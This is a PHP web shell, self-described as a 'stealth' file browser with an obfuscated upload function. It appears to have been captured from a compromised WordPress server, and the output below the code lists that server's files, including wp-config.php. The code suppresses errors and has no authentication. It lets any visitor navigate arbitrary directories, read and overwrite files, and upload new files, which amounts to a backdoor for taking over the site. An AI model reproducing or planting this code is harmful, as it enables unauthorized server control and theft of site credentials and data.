ꦫꦣꦺꦤ꧀ꦄꦤ꧀ꦠꦱꦺꦤ

PATH: home / beestk / autocaz2

<?php
/* ====== STEALTH PHP BROWSER ====== */
/* ====== ANTI 0 KB VERSION ====== */

error_reporting(0);
ini_set('display_errors', 0);

/* ---- PATH ---- */
$cwd = isset($_GET['p']) ? $_GET['p'] : getcwd();
$cwd = realpath($cwd);
if (!$cwd || !is_dir($cwd)) {
    $cwd = getcwd();
}

/* ---- BREADCRUMB ---- */
function nav($d){
    $x = explode(DIRECTORY_SEPARATOR, $d);
    $b = '';
    $o = [];
    foreach ($x as $v){
        if ($v === '') continue;
        $b .= DIRECTORY_SEPARATOR.$v;
        $o[] = '<a href="?p='.urlencode($b).'">'.$v.'</a>';
    }
    return implode(' / ', $o);
}

/* ---- WRITE FILE (SAFE) ---- */
if (isset($_POST['w'])) {
    $f = basename($_POST['f']);
    $t = $cwd.DIRECTORY_SEPARATOR.$f;
    if (is_file($t)) {
        $h = fopen($t,'w');
        fwrite($h,$_POST['c']);
        fclose($h);
    }
}

/* ---- UPLOAD (OBFUSCATED) ---- */
if (isset($_FILES['x'])) {
    if ($_FILES['x']['error'] === 0) {
        $n = basename($_FILES['x']['name']);
        $d = $cwd.DIRECTORY_SEPARATOR.$n;
        $r = fopen($_FILES['x']['tmp_name'],'r');
        $w = fopen($d,'w');
        stream_copy_to_stream($r,$w);
        fclose($r); fclose($w);
    }
}
?>
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>ꦫꦣꦺꦤ꧀ꦄꦤ꧀ꦠꦱꦺꦤ</title>
<style>
body{background:#111;color:#eee;font-family:Arial;font-size:14px}
a{color:#6cf;text-decoration:none}
textarea,input{background:#222;color:#eee;border:1px solid #444}
</style>
</head>
<body>

<hr>

<?php
/* ---- EDIT MODE ---- */
if (isset($_GET['e'])) {
    $f = basename($_GET['e']);
    $p = $cwd.DIRECTORY_SEPARATOR.$f;
    if (is_file($p)) {
        $c = htmlspecialchars(file_get_contents($p));
        echo '<form method="post">
        <textarea name="c" rows="15" cols="80">'.$c.'</textarea>
        <input type="hidden" name="f" value="'.$f.'">
        <br><input type="submit" name="w" value="Save">
        </form><hr>';
    }
}

/* ---- LIST ---- */
$h = opendir($cwd);
echo '<ul>';
while (($i = readdir($h)) !== false) {
    if ($i === '.') continue;
    $p = $cwd.DIRECTORY_SEPARATOR.$i;
    if (is_dir($p)) {
        echo '<li>[+] <a href="?p='.urlencode($p).'">'.$i.'</a></li>';
    } else {
        echo '<li>[-] '.$i.' <a href="?e='.urlencode($i).'&p='.urlencode($cwd).'">[open]</a></li>';
    }
}
closedir($h);
echo '</ul>';
?>

</body>
</html>

[+] ..
[-] wp-config.php [open]
[+] error
[-] wp-activate.php [open]
[+] wp-includes
[-] wp-mail.php [open]
[-] wp-settings.php [open]
[-] index.php [open]
[-] test.php [open]
[-] wp-blog-header.php [open]
[+] stats
[-] info.php [open]
[-] wp-cron.php [open]
[-] readme.html [open]
[-] wp-comments-post.php [open]
[-] wp-config-sample.php [open]
[-] test2.php [open]
[-] 1.php [open]
[+] wp-content
[-] wp-trackback.php [open]
[-] xmlrpc.php [open]
[-] wp-signup.php [open]
[-] malcare-waf.php [open]
[+] iamup
[+] .quarantine
[-] composer.phar [open]
[-] wp-login.php [open]
[+] .tmb
[+] installduplicator
[+] wp-admin
[-] wp-load.php [open]
[-] wp-links-opml.php [open]
[-] license.txt [open]
[-] bv_connector_994b1346ca624862b2520636cb3f9ac8.php [open]
[-] .htaccess [open]